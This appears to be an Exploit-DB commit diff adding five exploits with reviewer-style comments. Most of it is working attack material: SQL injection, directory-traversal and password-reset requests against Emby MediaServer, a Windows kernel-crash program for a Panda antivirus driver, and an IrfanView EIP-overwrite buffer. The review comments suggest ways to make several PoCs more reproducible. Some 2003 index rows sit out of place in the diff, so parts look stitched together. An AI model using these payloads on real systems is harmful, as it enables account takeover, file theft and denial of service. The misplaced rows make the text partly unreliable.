DB: 2017-05-01

5 new exploits

Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
IrfanView 4.44 - Denial of Service
Emby MediaServer 3.2.5 - SQL Injection
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Directory Traversal
Offensive Security 2017-05-01 05:01:18 +00:00
parent 72f98fab1c
commit e4147fb21e
6 changed files with 513 additions and 0 deletions

@ -5479,6 +5479,8 @@ id,file,description,date,author,platform,type,port
41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
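Review bot: the new 41945 row is missing the version that the exploit file itself records (`# Version: 18.0`), while the neighbouring 41949 row carries `4.44`; the product name also differs between the row (`Panda Free Antivirus`) and the file header (`Panda Cloud Antivirus Free`). Pick one form and put the version in the description, e.g. `"Panda Cloud Antivirus Free 18.0 - 'PSKMAD.sys' Denial of Service"`, so the row matches the file it points to and can be searched by version like the rest of the dos section.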
@ -37794,3 +37796,6 @@ id,file,description,date,author,platform,type,port
41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
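Review bot: the three Emby rows set the port column to 0 although every request in the three new advisories is sent to `Host: 10.211.55.3:8096`; the TYPO3 row just above uses 80 in the same column, so 8096 is the value that matches the PoCs. The platform value `multiple` is also at odds with the 41948 advisory's own description, which states that on 3.2.5 only the Windows release is affected (3.1.0 on Linux, Windows and Mac); since 41947 chains through 41948, the same restriction applies to the password-reset row, and a hint in the description would spare readers trying the 3.2.5 traversal on Linux.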

@ -0,0 +1,66 @@
Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
parameter 'MediaTypes' is not properly sanitised before being returned to the user
or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5400
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
PoC:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close
Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.
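Review bot: the PoC does not demonstrate what the title claims. A boolean-based blind injection needs a pair of requests, one with a true and one with a false condition in `MediaTypes`, whose responses differ; the hunk shows one request with a stray `'` and a 500 carrying `Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.`, which only shows that the quote reaches SQLite unescaped. Either add the true/false pair or retitle the advisory as an error-based finding. The description also omits a precondition the request makes plain: it carries `x-mediabrowser-token: ...` and a `UserId` in `x-emby-authorization`, so a valid session is required; "not properly sanitised before being returned to the user" should say so. Minor: the response reads `Server: Mono-HTTPAPI/1.0` while the tested-on block lists `Mono-HTTPAPI/1.1`.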

@ -0,0 +1,166 @@
Emby MediaServer 3.2.5 Password Reset Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------
http://10.211.55.3:8096/web/forgotpassword.html
2. Then, we type any random username and hit submit:
----------------------------------------------------
POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
EnteredUsername=RandomusUsuarius
3. You will get an alert message (Windows/Linux):
-------------------------------------------------
The following file has been created on your server and contains instructions on how to proceed:
C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
-- OR --
/var/lib/emby-server/passwordreset.txt
4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close
Use your web browser to visit:
http://10.211.55.3:8096/web/forgotpasswordpin.html
Enter the following pin code:
6727
The pin code will expire at 91
5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------
POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
Pin=6272
---
We get the message:
Passwords have been removed for the following users. To login, sign in with a blank password.
testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
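Review bot: the PIN values in steps 4 and 5 do not match: the disclosed `passwordreset.txt` says `6727`, the final request sends `Pin=6272`, and the server still answers with fifteen reset users. One of the two is a transcription error and should be fixed, because a reader reproducing the chain will otherwise conclude that the PIN is not checked at all, which is a different and much stronger finding than the one described. Two more points belong in the description: step 4 depends on ZSL-2017-5403, and the companion advisory states that on 3.2.5 only the Windows release is affected, so the unauthenticated chain as written applies to the Windows build of 3.2.5 (the `/var/lib/emby-server/passwordreset.txt` path is only reachable on the older 3.1.0 builds); and `The pin code will expire at 91` in the disclosed file is not a usable time, so the window the attacker has to submit the PIN is undocumented.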

@ -0,0 +1,157 @@
Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The vulnerability was confirmed on tested platforms depending on the version.
Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects
Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
properly verified before being used to load resources. This can be exploited to disclose
the contents of arbitrary files via directory traversal attacks.
================================================================================
/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
----------------------------------------------------------
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
public class SwaggerService : IService, IRequiresRequest
{
private readonly IServerApplicationPaths _appPaths;
private readonly IFileSystem _fileSystem;
public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
{
_appPaths = appPaths;
_fileSystem = fileSystem;
_resultFactory = resultFactory;
}
/// <summary>
/// Gets the specified request.
/// </summary>
/// <param name="request">The request.</param>
/// <returns>System.Object.</returns>
public object Get(GetSwaggerResource request)
{
var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
}
/// <summary>
/// Gets or sets the result factory.
/// </summary>
/// <value>The result factory.</value>
private readonly IHttpResultFactory _resultFactory;
/// <summary>
/// Gets or sets the request context.
/// </summary>
/// <value>The request context.</value>
public IRequest Request { get; set; }
}
}
================================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5403
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
==========================
On Linux:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
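Review bot: the root cause is visible in the quoted `Get` but the advisory never states it: `request.ResourceName` goes straight into `Path.Combine(swaggerDirectory, ...)` with only `/` mapped to the platform separator, nothing rejects `..` segments, and nothing checks that the result still lies under `swaggerDirectory`. Note also that `Path.Combine` returns its second argument unchanged when that argument is rooted, so an absolute `ResourceName` escapes without any `..` at all. Suggest adding a sentence on the fix, e.g. `var full = Path.GetFullPath(requestedFile);` followed by a check that `full` starts with `swaggerDirectory` plus the separator before `GetStaticFileResult` is called. The Windows PoC works because `Path.Combine` passes `..\` sequences through untouched on Windows; the Linux PoC on the last lines, by contrast, omits the `:8096` port every other request on the page uses and begins with `/%2femby`, a doubled leading slash, so it should be written in the same shape as the Windows request (`GET /emby/swagger-ui/..%2f..%2f...%2fetc%2fpasswd` against port 8096) to be reproducible as given.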

platforms/windows/dos/41945.c Executable file
@ -0,0 +1,89 @@
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
int main()
{
HANDLE hFile = NULL;
PVOID64 lpInBuffer = NULL;
ULONG64 lpBytesReturned;
PVOID64 BuffAddress = NULL;
SIZE_T BufferSize = 0x800;
printf("Trying the get the handle for the PSMEMDriver device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
return 1;
}
// Allocate memory for our buffer
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpInBuffer == NULL) {
printf("VirtualAlloc() failed. \r\n");
return 1;
}
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
*(PULONG64)BuffAddress = (ULONG64)0x42424242;
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
DeviceIoControl(hFile,
0xb3702c38,
lpInBuffer,
NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
NULL,
NULL,
&lpBytesReturned,
NULL);
/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
printf("Cleaning up.\r\n");
VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
CloseHandle(hFile);
printf("Resources freed up.\r\n");
return 0;
}
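Review bot: three defects in the PoC body, harmless once the IOCTL takes the machine down but real whenever it does not. `VirtualFree(lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE)` always fails: `MEM_RELEASE` requires `dwSize` to be 0, and `sizeof(lpInBuffer)` is the size of the pointer, not of the 0x800-byte mapping, so the cleanup the comment promises never happens. `lpBytesReturned` is declared `ULONG64` but `DeviceIoControl` takes an `LPDWORD`, so `&lpBytesReturned` is the wrong pointer type; declare it `DWORD`. `#include "stdafx.h"` ties a 60-line file to a Visual Studio precompiled-header project and nothing in it needs that header. Header nits: `# Vendor Homepage` points at saptech-erp.com.au, which is not Panda's site; the title names `PSKMAD.sys` while the handle is opened on `\\.\PSMEMDriver` and the driver name otherwise appears only in the comment on the input-size argument (`bp PSKMAD+3150`), so one line stating that `PSMEMDriver` is the device exposed by `PSKMAD.sys` would tie the entry together; and the IOCTL is sent with an input size of `NULL` (0) while the comment says the crash path is reached with `BufferSize`, which leaves the reader unsure which variant actually produced the BSoD on the two listed systems.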

platforms/windows/dos/41949.py Executable file
@ -0,0 +1,30 @@
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
#POC
#!usr/bin/python
eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"
print buffer #a) irfanview->Option->Properties/Settings->Extensions
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)
#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?
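Review bot: the interpreter line `#!usr/bin/python` is malformed (no leading `/`) and sits after a block of comments, so it is never honoured as a shebang; move it to the first line as `#!/usr/bin/env python`, and note that `print buffer` is Python 2 syntax. The file and the CSV row disagree on what this is: the row says `IrfanView 4.44 - Denial of Service`, the header says `OtherExtensions Input Overflow`, and the payload (199 bytes of padding, a `jmp esp` taken from user32.dll on WinXP Pro SP3, then a single `\xcc` where shellcode would go) is a controlled-EIP overflow whose exploitability the author leaves open, which is worth saying in the title. The `jmp esp` address is only valid for that one user32.dll build and should be flagged as such. The bad-character note `those instruction that start with 6,7,8,E,F` should state concretely what is excluded (presumably bytes whose high nibble is 6, 7, 8, E or F, i.e. 0x60-0x8F and 0xE0-0xFF), since as written a reader cannot build a payload from it.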